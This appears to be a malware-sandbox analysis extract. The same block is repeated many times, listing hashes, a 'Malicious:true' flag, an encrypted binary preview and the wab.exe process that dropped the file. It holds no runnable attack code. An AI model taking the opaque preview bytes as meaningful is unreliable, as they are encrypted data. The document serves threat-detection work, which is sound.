                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
